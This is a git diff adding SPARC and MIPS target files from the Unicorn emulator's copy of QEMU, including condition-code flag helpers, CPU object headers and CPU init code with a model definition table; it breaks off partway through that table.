b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/unicorn.h @@ -0,0 +1,23 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh , 2015 */ + +#ifndef UC_QEMU_TARGET_MIPS_H +#define 
UC_QEMU_TARGET_MIPS_H + +// functions to read & write registers +int mips_reg_read(struct uc_struct *uc, unsigned int *regs, void **vals, int count); +int mips_reg_write(struct uc_struct *uc, unsigned int *regs, void *const *vals, int count); + +void mips_reg_reset(struct uc_struct *uc); + +void mips_uc_init(struct uc_struct* uc); +void mipsel_uc_init(struct uc_struct* uc); +void mips64_uc_init(struct uc_struct* uc); +void mips64el_uc_init(struct uc_struct* uc); + +extern const int MIPS_REGS_STORAGE_SIZE_mips; +extern const int MIPS_REGS_STORAGE_SIZE_mipsel; +extern const int MIPS64_REGS_STORAGE_SIZE_mips64; +extern const int MIPS64_REGS_STORAGE_SIZE_mips64el; + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/Makefile.objs b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/Makefile.objs new file mode 100644 index 0000000..a04ffad --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/Makefile.objs @@ -0,0 +1,7 @@ +obj-y += translate.o helper.o cpu.o +obj-y += fop_helper.o cc_helper.o win_helper.o mmu_helper.o ldst_helper.o +obj-$(TARGET_SPARC) += int32_helper.o +obj-$(TARGET_SPARC64) += int64_helper.o +obj-$(TARGET_SPARC64) += vis_helper.o +obj-$(TARGET_SPARC) += unicorn.o +obj-$(TARGET_SPARC64) += unicorn64.o diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/TODO b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/TODO new file mode 100644 index 0000000..b8c727e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/TODO @@ -0,0 +1,88 @@ +TODO-list: + +CPU common: +- Unimplemented features/bugs: + - Delay slot handling may fail sometimes (branch end of page, delay + slot next page) + - Atomical instructions + - CPU features should match real CPUs (also ASI selection) +- Optimizations/improvements: + - Condition code/branch handling like x86, also for FPU? 
+ - Remove remaining explicit alignment checks + - Global register for regwptr, so that windowed registers can be + accessed directly + - Improve Sparc32plus addressing + - NPC/PC static optimisations (use JUMP_TB when possible)? (Is this + obsolete?) + - Synthetic instructions + - MMU model dependent on CPU model + - Select ASI helper at translation time (on V9 only if known) + - KQemu/KVM support for VM only + - Hardware breakpoint/watchpoint support + - Cache emulation mode + - Reverse-endian pages + - Faster FPU emulation + - Busy loop detection + +Sparc32 CPUs: +- Unimplemented features/bugs: + - Sun4/Sun4c MMUs + - Some V8 ASIs + +Sparc64 CPUs: +- Unimplemented features/bugs: + - Interrupt handling + - Secondary address space, other MMU functions + - Many V9/UA2005/UA2007 ASIs + - Rest of V9 instructions, missing VIS instructions + - IG/MG/AG vs. UA2007 globals + - Full hypervisor support + - SMP/CMT + - Sun4v CPUs + +Sun4: +- To be added + +Sun4c: +- A lot of unimplemented features +- Maybe split from Sun4m + +Sun4m: +- Unimplemented features/bugs: + - Hardware devices do not match real boards + - Floppy does not work + - CS4231: merge with cs4231a, add DMA + - Add cg6, bwtwo + - Arbitrary resolution support + - PCI for MicroSparc-IIe + - JavaStation machines + - SBus slot probing, FCode ROM support + - SMP probing support + - Interrupt routing does not match real HW + - SuSE 7.3 keyboard sometimes unresponsive + - Gentoo 2004.1 SMP does not work + - SS600MP ledma -> lebuffer + - Type 5 keyboard + - Less fixed hardware choices + - DBRI audio (Am7930) + - BPP parallel + - Diagnostic switch + - ESP PIO mode + +Sun4d: +- A lot of unimplemented features: + - SBI + - IO-unit +- Maybe split from Sun4m + +Sun4u: +- Unimplemented features/bugs: + - Interrupt controller + - PCI/IOMMU support (Simba, JIO, Tomatillo, Psycho, Schizo, Safari...) 
+ - SMP + - Happy Meal Ethernet, flash, I2C, GPIO + - A lot of real machine types + +Sun4v: +- A lot of unimplemented features + - A lot of real machine types diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/cc_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/cc_helper.c new file mode 100644 index 0000000..69823b7 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/cc_helper.c @@ -0,0 +1,492 @@ +/* + * Helpers for lazy condition code handling + * + * Copyright (c) 2003-2005 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . 
+ */ + +#include "cpu.h" +#include "exec/helper-proto.h" + +static uint32_t compute_null(CPUSPARCState *env) +{ + return 0; +} + +static uint32_t compute_all_flags(CPUSPARCState *env) +{ + return env->psr & PSR_ICC; +} + +static uint32_t compute_C_flags(CPUSPARCState *env) +{ + return env->psr & PSR_CARRY; +} + +static inline uint32_t get_NZ_icc(int32_t dst) +{ + uint32_t ret = 0; + + if (dst == 0) { + ret = PSR_ZERO; + } else if (dst < 0) { + ret = PSR_NEG; + } + return ret; +} + +#ifdef TARGET_SPARC64 +static uint32_t compute_all_flags_xcc(CPUSPARCState *env) +{ + return env->xcc & PSR_ICC; +} + +static uint32_t compute_C_flags_xcc(CPUSPARCState *env) +{ + return env->xcc & PSR_CARRY; +} + +static inline uint32_t get_NZ_xcc(target_long dst) +{ + uint32_t ret = 0; + + if (!dst) { + ret = PSR_ZERO; + } else if (dst < 0) { + ret = PSR_NEG; + } + return ret; +} +#endif + +static inline uint32_t get_V_div_icc(target_ulong src2) +{ + uint32_t ret = 0; + + if (src2 != 0) { + ret = PSR_OVF; + } + return ret; +} + +static uint32_t compute_all_div(CPUSPARCState *env) +{ + uint32_t ret; + + ret = get_NZ_icc(CC_DST); + ret |= get_V_div_icc(CC_SRC2); + return ret; +} + +static uint32_t compute_C_div(CPUSPARCState *env) +{ + return 0; +} + +static inline uint32_t get_C_add_icc(uint32_t dst, uint32_t src1) +{ + uint32_t ret = 0; + + if (dst < src1) { + ret = PSR_CARRY; + } + return ret; +} + +static inline uint32_t get_C_addx_icc(uint32_t dst, uint32_t src1, + uint32_t src2) +{ + uint32_t ret = 0; + + if (((src1 & src2) | (~dst & (src1 | src2))) & (1U << 31)) { + ret = PSR_CARRY; + } + return ret; +} + +static inline uint32_t get_V_add_icc(uint32_t dst, uint32_t src1, + uint32_t src2) +{ + uint32_t ret = 0; + + if (((src1 ^ src2 ^ -1) & (src1 ^ dst)) & (1U << 31)) { + ret = PSR_OVF; + } + return ret; +} + +#ifdef TARGET_SPARC64 +static inline uint32_t get_C_add_xcc(target_ulong dst, target_ulong src1) +{ + uint32_t ret = 0; + + if (dst < src1) { + ret = PSR_CARRY; + } + return 
ret; +} + +static inline uint32_t get_C_addx_xcc(target_ulong dst, target_ulong src1, + target_ulong src2) +{ + uint32_t ret = 0; + + if (((src1 & src2) | (~dst & (src1 | src2))) & (1ULL << 63)) { + ret = PSR_CARRY; + } + return ret; +} + +static inline uint32_t get_V_add_xcc(target_ulong dst, target_ulong src1, + target_ulong src2) +{ + uint32_t ret = 0; + + if (((src1 ^ src2 ^ -1) & (src1 ^ dst)) & (1ULL << 63)) { + ret = PSR_OVF; + } + return ret; +} + +static uint32_t compute_all_add_xcc(CPUSPARCState *env) +{ + uint32_t ret; + + ret = get_NZ_xcc(CC_DST); + ret |= get_C_add_xcc(CC_DST, CC_SRC); + ret |= get_V_add_xcc(CC_DST, CC_SRC, CC_SRC2); + return ret; +} + +static uint32_t compute_C_add_xcc(CPUSPARCState *env) +{ + return get_C_add_xcc(CC_DST, CC_SRC); +} +#endif + +static uint32_t compute_all_add(CPUSPARCState *env) +{ + uint32_t ret; + + ret = get_NZ_icc(CC_DST); + ret |= get_C_add_icc(CC_DST, CC_SRC); + ret |= get_V_add_icc(CC_DST, CC_SRC, CC_SRC2); + return ret; +} + +static uint32_t compute_C_add(CPUSPARCState *env) +{ + return get_C_add_icc(CC_DST, CC_SRC); +} + +#ifdef TARGET_SPARC64 +static uint32_t compute_all_addx_xcc(CPUSPARCState *env) +{ + uint32_t ret; + + ret = get_NZ_xcc(CC_DST); + ret |= get_C_addx_xcc(CC_DST, CC_SRC, CC_SRC2); + ret |= get_V_add_xcc(CC_DST, CC_SRC, CC_SRC2); + return ret; +} + +static uint32_t compute_C_addx_xcc(CPUSPARCState *env) +{ + uint32_t ret; + + ret = get_C_addx_xcc(CC_DST, CC_SRC, CC_SRC2); + return ret; +} +#endif + +static uint32_t compute_all_addx(CPUSPARCState *env) +{ + uint32_t ret; + + ret = get_NZ_icc(CC_DST); + ret |= get_C_addx_icc(CC_DST, CC_SRC, CC_SRC2); + ret |= get_V_add_icc(CC_DST, CC_SRC, CC_SRC2); + return ret; +} + +static uint32_t compute_C_addx(CPUSPARCState *env) +{ + uint32_t ret; + + ret = get_C_addx_icc(CC_DST, CC_SRC, CC_SRC2); + return ret; +} + +static inline uint32_t get_V_tag_icc(target_ulong src1, target_ulong src2) +{ + uint32_t ret = 0; + + if ((src1 | src2) & 0x3) { + ret = 
PSR_OVF; + } + return ret; +} + +static uint32_t compute_all_tadd(CPUSPARCState *env) +{ + uint32_t ret; + + ret = get_NZ_icc(CC_DST); + ret |= get_C_add_icc(CC_DST, CC_SRC); + ret |= get_V_add_icc(CC_DST, CC_SRC, CC_SRC2); + ret |= get_V_tag_icc(CC_SRC, CC_SRC2); + return ret; +} + +static uint32_t compute_all_taddtv(CPUSPARCState *env) +{ + uint32_t ret; + + ret = get_NZ_icc(CC_DST); + ret |= get_C_add_icc(CC_DST, CC_SRC); + return ret; +} + +static inline uint32_t get_C_sub_icc(uint32_t src1, uint32_t src2) +{ + uint32_t ret = 0; + + if (src1 < src2) { + ret = PSR_CARRY; + } + return ret; +} + +static inline uint32_t get_C_subx_icc(uint32_t dst, uint32_t src1, + uint32_t src2) +{ + uint32_t ret = 0; + + if (((~src1 & src2) | (dst & (~src1 | src2))) & (1U << 31)) { + ret = PSR_CARRY; + } + return ret; +} + +static inline uint32_t get_V_sub_icc(uint32_t dst, uint32_t src1, + uint32_t src2) +{ + uint32_t ret = 0; + + if (((src1 ^ src2) & (src1 ^ dst)) & (1U << 31)) { + ret = PSR_OVF; + } + return ret; +} + + +#ifdef TARGET_SPARC64 +static inline uint32_t get_C_sub_xcc(target_ulong src1, target_ulong src2) +{ + uint32_t ret = 0; + + if (src1 < src2) { + ret = PSR_CARRY; + } + return ret; +} + +static inline uint32_t get_C_subx_xcc(target_ulong dst, target_ulong src1, + target_ulong src2) +{ + uint32_t ret = 0; + + if (((~src1 & src2) | (dst & (~src1 | src2))) & (1ULL << 63)) { + ret = PSR_CARRY; + } + return ret; +} + +static inline uint32_t get_V_sub_xcc(target_ulong dst, target_ulong src1, + target_ulong src2) +{ + uint32_t ret = 0; + + if (((src1 ^ src2) & (src1 ^ dst)) & (1ULL << 63)) { + ret = PSR_OVF; + } + return ret; +} + +static uint32_t compute_all_sub_xcc(CPUSPARCState *env) +{ + uint32_t ret; + + ret = get_NZ_xcc(CC_DST); + ret |= get_C_sub_xcc(CC_SRC, CC_SRC2); + ret |= get_V_sub_xcc(CC_DST, CC_SRC, CC_SRC2); + return ret; +} + +static uint32_t compute_C_sub_xcc(CPUSPARCState *env) +{ + return get_C_sub_xcc(CC_SRC, CC_SRC2); +} +#endif + +static 
uint32_t compute_all_sub(CPUSPARCState *env) +{ + uint32_t ret; + + ret = get_NZ_icc(CC_DST); + ret |= get_C_sub_icc(CC_SRC, CC_SRC2); + ret |= get_V_sub_icc(CC_DST, CC_SRC, CC_SRC2); + return ret; +} + +static uint32_t compute_C_sub(CPUSPARCState *env) +{ + return get_C_sub_icc(CC_SRC, CC_SRC2); +} + +#ifdef TARGET_SPARC64 +static uint32_t compute_all_subx_xcc(CPUSPARCState *env) +{ + uint32_t ret; + + ret = get_NZ_xcc(CC_DST); + ret |= get_C_subx_xcc(CC_DST, CC_SRC, CC_SRC2); + ret |= get_V_sub_xcc(CC_DST, CC_SRC, CC_SRC2); + return ret; +} + +static uint32_t compute_C_subx_xcc(CPUSPARCState *env) +{ + uint32_t ret; + + ret = get_C_subx_xcc(CC_DST, CC_SRC, CC_SRC2); + return ret; +} +#endif + +static uint32_t compute_all_subx(CPUSPARCState *env) +{ + uint32_t ret; + + ret = get_NZ_icc(CC_DST); + ret |= get_C_subx_icc(CC_DST, CC_SRC, CC_SRC2); + ret |= get_V_sub_icc(CC_DST, CC_SRC, CC_SRC2); + return ret; +} + +static uint32_t compute_C_subx(CPUSPARCState *env) +{ + uint32_t ret; + + ret = get_C_subx_icc(CC_DST, CC_SRC, CC_SRC2); + return ret; +} + +static uint32_t compute_all_tsub(CPUSPARCState *env) +{ + uint32_t ret; + + ret = get_NZ_icc(CC_DST); + ret |= get_C_sub_icc(CC_SRC, CC_SRC2); + ret |= get_V_sub_icc(CC_DST, CC_SRC, CC_SRC2); + ret |= get_V_tag_icc(CC_SRC, CC_SRC2); + return ret; +} + +static uint32_t compute_all_tsubtv(CPUSPARCState *env) +{ + uint32_t ret; + + ret = get_NZ_icc(CC_DST); + ret |= get_C_sub_icc(CC_SRC, CC_SRC2); + return ret; +} + +static uint32_t compute_all_logic(CPUSPARCState *env) +{ + return get_NZ_icc(CC_DST); +} + +static uint32_t compute_C_logic(CPUSPARCState *env) +{ + return 0; +} + +#ifdef TARGET_SPARC64 +static uint32_t compute_all_logic_xcc(CPUSPARCState *env) +{ + return get_NZ_xcc(CC_DST); +} +#endif + +typedef struct CCTable { + uint32_t (*compute_all)(CPUSPARCState *env); /* return all the flags */ + uint32_t (*compute_c)(CPUSPARCState *env); /* return the C flag */ +} CCTable; + +static const CCTable 
icc_table[CC_OP_NB] = { + /* CC_OP_DYNAMIC should never happen */ + { compute_null, compute_null }, + { compute_all_flags, compute_C_flags }, + { compute_all_div, compute_C_div }, + { compute_all_add, compute_C_add }, + { compute_all_addx, compute_C_addx }, + { compute_all_tadd, compute_C_add }, + { compute_all_taddtv, compute_C_add }, + { compute_all_sub, compute_C_sub }, + { compute_all_subx, compute_C_subx }, + { compute_all_tsub, compute_C_sub }, + { compute_all_tsubtv, compute_C_sub }, + { compute_all_logic, compute_C_logic }, +}; + +#ifdef TARGET_SPARC64 +static const CCTable xcc_table[CC_OP_NB] = { + /* CC_OP_DYNAMIC should never happen */ + { compute_null, compute_null }, + { compute_all_flags_xcc, compute_C_flags_xcc }, + { compute_all_logic_xcc, compute_C_logic }, + { compute_all_add_xcc, compute_C_add_xcc }, + { compute_all_addx_xcc, compute_C_addx_xcc }, + { compute_all_add_xcc, compute_C_add_xcc }, + { compute_all_add_xcc, compute_C_add_xcc }, + { compute_all_sub_xcc, compute_C_sub_xcc }, + { compute_all_subx_xcc, compute_C_subx_xcc }, + { compute_all_sub_xcc, compute_C_sub_xcc }, + { compute_all_sub_xcc, compute_C_sub_xcc }, + { compute_all_logic_xcc, compute_C_logic }, +}; +#endif + +void helper_compute_psr(CPUSPARCState *env) +{ + uint32_t new_psr; + + new_psr = icc_table[CC_OP].compute_all(env); + env->psr = new_psr; +#ifdef TARGET_SPARC64 + new_psr = xcc_table[CC_OP].compute_all(env); + env->xcc = new_psr; +#endif + CC_OP = CC_OP_FLAGS; +} + +uint32_t helper_compute_C_icc(CPUSPARCState *env) +{ + uint32_t ret; + + ret = icc_table[CC_OP].compute_c(env) >> PSR_CARRY_SHIFT; + return ret; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/cpu-qom.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/cpu-qom.h new file mode 100644 index 0000000..6374fe8 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/cpu-qom.h @@ -0,0 +1,87 @@ +/* + * QEMU SPARC CPU + * + * Copyright (c) 2012 SUSE LINUX Products 
GmbH + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2.1 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see + * + */ +#ifndef QEMU_SPARC_CPU_QOM_H +#define QEMU_SPARC_CPU_QOM_H + +#include "qom/cpu.h" +#include "cpu.h" + +#ifdef TARGET_SPARC64 +#define TYPE_SPARC_CPU "sparc64-cpu" +#else +#define TYPE_SPARC_CPU "sparc-cpu" +#endif + +#define SPARC_CPU_CLASS(uc, klass) \ + OBJECT_CLASS_CHECK(uc, SPARCCPUClass, (klass), TYPE_SPARC_CPU) +#define SPARC_CPU(uc, obj) ((SPARCCPU *)obj) +#define SPARC_CPU_GET_CLASS(uc, obj) \ + OBJECT_GET_CLASS(uc, SPARCCPUClass, (obj), TYPE_SPARC_CPU) + +/** + * SPARCCPUClass: + * @parent_realize: The parent class' realize handler. + * @parent_reset: The parent class' reset handler. + * + * A SPARC CPU model. + */ +typedef struct SPARCCPUClass { + /*< private >*/ + CPUClass parent_class; + /*< public >*/ + + DeviceRealize parent_realize; + void (*parent_reset)(CPUState *cpu); +} SPARCCPUClass; + +/** + * SPARCCPU: + * @env: #CPUSPARCState + * + * A SPARC CPU. 
+ */ +typedef struct SPARCCPU { + /*< private >*/ + CPUState parent_obj; + /*< public >*/ + + CPUSPARCState env; +} SPARCCPU; + +static inline SPARCCPU *sparc_env_get_cpu(CPUSPARCState *env) +{ + return container_of(env, SPARCCPU, env); +} + +#define ENV_GET_CPU(e) CPU(sparc_env_get_cpu(e)) + +#define ENV_OFFSET offsetof(SPARCCPU, env) + +void sparc_cpu_do_interrupt(CPUState *cpu); +void sparc_cpu_dump_state(CPUState *cpu, FILE *f, + fprintf_function cpu_fprintf, int flags); +hwaddr sparc_cpu_get_phys_page_debug(CPUState *cpu, vaddr addr); +int sparc_cpu_gdb_read_register(CPUState *cpu, uint8_t *buf, int reg); +int sparc_cpu_gdb_write_register(CPUState *cpu, uint8_t *buf, int reg); +void QEMU_NORETURN sparc_cpu_do_unaligned_access(CPUState *cpu, + vaddr addr, int is_write, + int is_user, uintptr_t retaddr); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/cpu.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/cpu.c new file mode 100644 index 0000000..9c9c5ea --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/cpu.c @@ -0,0 +1,923 @@ +/* + * Sparc CPU init helpers + * + * Copyright (c) 2003-2005 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . 
+ */ + +#include "cpu.h" +#include "hw/sparc/sparc.h" + +//#define DEBUG_FEATURES + +static int cpu_sparc_find_by_name(sparc_def_t *cpu_def, const char *cpu_model); + +/* CPUClass::reset() */ +static void sparc_cpu_reset(CPUState *s) +{ + SPARCCPU *cpu = SPARC_CPU(s->uc, s); + SPARCCPUClass *scc = SPARC_CPU_GET_CLASS(s->uc, cpu); + CPUSPARCState *env = &cpu->env; + + scc->parent_reset(s); + + memset(env, 0, offsetof(CPUSPARCState, version)); + tlb_flush(s, 1); + env->cwp = 0; +#ifndef TARGET_SPARC64 + env->wim = 1; +#endif + env->regwptr = env->regbase + (env->cwp * 16); + CC_OP = CC_OP_FLAGS; +#if defined(CONFIG_USER_ONLY) +#ifdef TARGET_SPARC64 + env->cleanwin = env->nwindows - 2; + env->cansave = env->nwindows - 2; + env->pstate = PS_RMO | PS_PEF | PS_IE; + env->asi = 0x82; /* Primary no-fault */ +#endif +#else +#if !defined(TARGET_SPARC64) + env->psret = 0; + env->psrs = 1; + env->psrps = 1; +#endif +#ifdef TARGET_SPARC64 + env->pstate = PS_PRIV|PS_RED|PS_PEF|PS_AG; + env->hpstate = cpu_has_hypervisor(env) ? 
HS_PRIV : 0; + env->tl = env->maxtl; + cpu_tsptr(env)->tt = TT_POWER_ON_RESET; + env->lsu = 0; +#else + env->mmuregs[0] &= ~(MMU_E | MMU_NF); + env->mmuregs[0] |= env->def->mmu_bm; +#endif + env->pc = 0; + env->npc = env->pc + 4; +#endif + env->cache_control = 0; +} + +static bool sparc_cpu_exec_interrupt(CPUState *cs, int interrupt_request) +{ + if (interrupt_request & CPU_INTERRUPT_HARD) { + SPARCCPU *cpu = SPARC_CPU(cs->uc, cs); + CPUSPARCState *env = &cpu->env; + + if (cpu_interrupts_enabled(env) && env->interrupt_index > 0) { + int pil = env->interrupt_index & 0xf; + int type = env->interrupt_index & 0xf0; + + if (type != TT_EXTINT || cpu_pil_allowed(env, pil)) { + cs->exception_index = env->interrupt_index; + sparc_cpu_do_interrupt(cs); + return true; + } + } + } + return false; +} + +static int cpu_sparc_register(struct uc_struct *uc, SPARCCPU *cpu, const char *cpu_model) +{ + CPUClass *cc = CPU_GET_CLASS(uc, cpu); + CPUSPARCState *env = &cpu->env; + char *s = g_strdup(cpu_model); + char *featurestr, *name = strtok(s, ","); + sparc_def_t def1, *def = &def1; + Error *err = NULL; + + if (cpu_sparc_find_by_name(def, name) < 0) { + g_free(s); + return -1; + } + + env->def = g_new0(sparc_def_t, 1); + memcpy(env->def, def, sizeof(*def)); + + featurestr = strtok(NULL, ","); + cc->parse_features(CPU(cpu), featurestr, &err); + g_free(s); + if (err) { + //error_report("%s", error_get_pretty(err)); + error_free(err); + return -1; + } + + env->version = def->iu_version; + env->fsr = def->fpu_version; + env->nwindows = def->nwindows; +#if !defined(TARGET_SPARC64) + env->mmuregs[0] |= def->mmu_version; + cpu_sparc_set_id(env, 0); + env->mxccregs[7] |= def->mxcc_version; +#else + env->mmu_version = def->mmu_version; + env->maxtl = def->maxtl; + env->version |= def->maxtl << 8; + env->version |= def->nwindows - 1; +#endif + return 0; +} + +SPARCCPU *cpu_sparc_init(struct uc_struct *uc, const char *cpu_model) +{ + SPARCCPU *cpu; + + cpu = SPARC_CPU(uc, object_new(uc, 
TYPE_SPARC_CPU)); + + if (cpu_sparc_register(uc, cpu, cpu_model) < 0) { + object_unref(uc, OBJECT(cpu)); + return NULL; + } + + object_property_set_bool(uc, OBJECT(cpu), true, "realized", NULL); + + return cpu; +} + +void cpu_sparc_set_id(CPUSPARCState *env, unsigned int cpu) +{ +#if !defined(TARGET_SPARC64) + env->mxccregs[7] = ((cpu + 8) & 0xf) << 24; +#endif +} + +static const sparc_def_t sparc_defs[] = { +#ifdef TARGET_SPARC64 + { + "Fujitsu Sparc64", + ((0x04ULL << 48) | (0x02ULL << 32) | (0ULL << 24)), + 0x00000000, + mmu_us_12, + 0,0,0,0,0,0, + CPU_DEFAULT_FEATURES, + 4, + 4, + }, + { + "Fujitsu Sparc64 III", + ((0x04ULL << 48) | (0x03ULL << 32) | (0ULL << 24)), + 0x00000000, + mmu_us_12, + 0,0,0,0,0,0, + CPU_DEFAULT_FEATURES, + 5, + 4, + }, + { + "Fujitsu Sparc64 IV", + ((0x04ULL << 48) | (0x04ULL << 32) | (0ULL << 24)), + 0x00000000, + mmu_us_12, + 0,0,0,0,0,0, + CPU_DEFAULT_FEATURES, + 8, + 5, + }, + { + "Fujitsu Sparc64 V", + ((0x04ULL << 48) | (0x05ULL << 32) | (0x51ULL << 24)), + 0x00000000, + mmu_us_12, + 0,0,0,0,0,0, + CPU_DEFAULT_FEATURES, + 8, + 5, + }, + { + "TI UltraSparc I", + ((0x17ULL << 48) | (0x10ULL << 32) | (0x40ULL << 24)), + 0x00000000, + mmu_us_12, + 0,0,0,0,0,0, + CPU_DEFAULT_FEATURES, + 8, + 5, + }, + { + "TI UltraSparc II", + ((0x17ULL << 48) | (0x11ULL << 32) | (0x20ULL << 24)), + 0x00000000, + mmu_us_12, + 0,0,0,0,0,0, + CPU_DEFAULT_FEATURES, + 8, + 5, + }, + { + "TI UltraSparc IIi", + ((0x17ULL << 48) | (0x12ULL << 32) | (0x91ULL << 24)), + 0x00000000, + mmu_us_12, + 0,0,0,0,0,0, + CPU_DEFAULT_FEATURES, + 8, + 5, + }, + { + "TI UltraSparc IIe", + ((0x17ULL << 48) | (0x13ULL << 32) | (0x14ULL << 24)), + 0x00000000, + mmu_us_12, + 0,0,0,0,0,0, + CPU_DEFAULT_FEATURES, + 8, + 5, + }, + { + "Sun UltraSparc III", + ((0x3eULL << 48) | (0x14ULL << 32) | (0x34ULL << 24)), + 0x00000000, + mmu_us_12, + 0,0,0,0,0,0, + CPU_DEFAULT_FEATURES, + 8, + 5, + }, + { + "Sun UltraSparc III Cu", + ((0x3eULL << 48) | (0x15ULL << 32) | (0x41ULL << 24)), + 
0x00000000, + mmu_us_3, + 0,0,0,0,0,0, + CPU_DEFAULT_FEATURES, + 8, + 5, + }, + { + "Sun UltraSparc IIIi", + ((0x3eULL << 48) | (0x16ULL << 32) | (0x34ULL << 24)), + 0x00000000, + mmu_us_12, + 0,0,0,0,0,0, + CPU_DEFAULT_FEATURES, + 8, + 5, + }, + { + "Sun UltraSparc IV", + ((0x3eULL << 48) | (0x18ULL << 32) | (0x31ULL << 24)), + 0x00000000, + mmu_us_4, + 0,0,0,0,0,0, + CPU_DEFAULT_FEATURES, + 8, + 5, + }, + { + "Sun UltraSparc IV+", + ((0x3eULL << 48) | (0x19ULL << 32) | (0x22ULL << 24)), + 0x00000000, + mmu_us_12, + 0,0,0,0,0,0, + CPU_DEFAULT_FEATURES | CPU_FEATURE_CMT, + 8, + 5, + }, + { + "Sun UltraSparc IIIi+", + ((0x3eULL << 48) | (0x22ULL << 32) | (0ULL << 24)), + 0x00000000, + mmu_us_3, + 0,0,0,0,0,0, + CPU_DEFAULT_FEATURES, + 8, + 5, + }, + { + "Sun UltraSparc T1", + /* defined in sparc_ifu_fdp.v and ctu.h */ + ((0x3eULL << 48) | (0x23ULL << 32) | (0x02ULL << 24)), + 0x00000000, + mmu_sun4v, + 0,0,0,0,0,0, + CPU_DEFAULT_FEATURES | CPU_FEATURE_HYPV | CPU_FEATURE_CMT + | CPU_FEATURE_GL, + 8, + 6, + }, + { + "Sun UltraSparc T2", + /* defined in tlu_asi_ctl.v and n2_revid_cust.v */ + ((0x3eULL << 48) | (0x24ULL << 32) | (0x02ULL << 24)), + 0x00000000, + mmu_sun4v, + 0,0,0,0,0,0, + CPU_DEFAULT_FEATURES | CPU_FEATURE_HYPV | CPU_FEATURE_CMT + | CPU_FEATURE_GL, + 8, + 6, + }, + { + "NEC UltraSparc I", + ((0x22ULL << 48) | (0x10ULL << 32) | (0x40ULL << 24)), + 0x00000000, + mmu_us_12, + 0,0,0,0,0,0, + CPU_DEFAULT_FEATURES, + 8, + 5, + }, +#else + { + "Fujitsu MB86904", + 0x04 << 24, /* Impl 0, ver 4 */ + 4 << 17, /* FPU version 4 (Meiko) */ + 0x04 << 24, /* Impl 0, ver 4 */ + 0x00004000, + 0x00ffffc0, + 0x000000ff, + 0x00016fff, + 0x00ffffff, + 0, + CPU_DEFAULT_FEATURES, + 8, + 0, + }, + { + "Fujitsu MB86907", + 0x05 << 24, /* Impl 0, ver 5 */ + 4 << 17, /* FPU version 4 (Meiko) */ + 0x05 << 24, /* Impl 0, ver 5 */ + 0x00004000, + 0xffffffc0, + 0x000000ff, + 0x00016fff, + 0xffffffff, + 0, + CPU_DEFAULT_FEATURES, + 8, + 0, + }, + { + "TI MicroSparc I", + 0x41000000, 
+ 4 << 17, + 0x41000000, + 0x00004000, + 0x007ffff0, + 0x0000003f, + 0x00016fff, + 0x0000003f, + 0, + CPU_FEATURE_FLOAT | CPU_FEATURE_SWAP | CPU_FEATURE_MUL | + CPU_FEATURE_DIV | CPU_FEATURE_FLUSH | CPU_FEATURE_FSQRT | + CPU_FEATURE_FMUL, + 7, + 0, + }, + { + "TI MicroSparc II", + 0x42000000, + 4 << 17, + 0x02000000, + 0x00004000, + 0x00ffffc0, + 0x000000ff, + 0x00016fff, + 0x00ffffff, + 0, + CPU_DEFAULT_FEATURES, + 8, + 0, + }, + { + "TI MicroSparc IIep", + 0x42000000, + 4 << 17, + 0x04000000, + 0x00004000, + 0x00ffffc0, + 0x000000ff, + 0x00016bff, + 0x00ffffff, + 0, + CPU_DEFAULT_FEATURES, + 8, + 0, + }, + { + "TI SuperSparc 40", /* STP1020NPGA */ + 0x41000000, /* SuperSPARC 2.x */ + 0 << 17, + 0x00000800, /* SuperSPARC 2.x, no MXCC */ + 0x00002000, + 0xffffffc0, + 0x0000ffff, + 0xffffffff, + 0xffffffff, + 0, + CPU_DEFAULT_FEATURES, + 8, + 0, + }, + { + "TI SuperSparc 50", /* STP1020PGA */ + 0x40000000, /* SuperSPARC 3.x */ + 0 << 17, + 0x01000800, /* SuperSPARC 3.x, no MXCC */ + 0x00002000, + 0xffffffc0, + 0x0000ffff, + 0xffffffff, + 0xffffffff, + 0, + CPU_DEFAULT_FEATURES, + 8, + 0, + }, + { + "TI SuperSparc 51", + 0x40000000, /* SuperSPARC 3.x */ + 0 << 17, 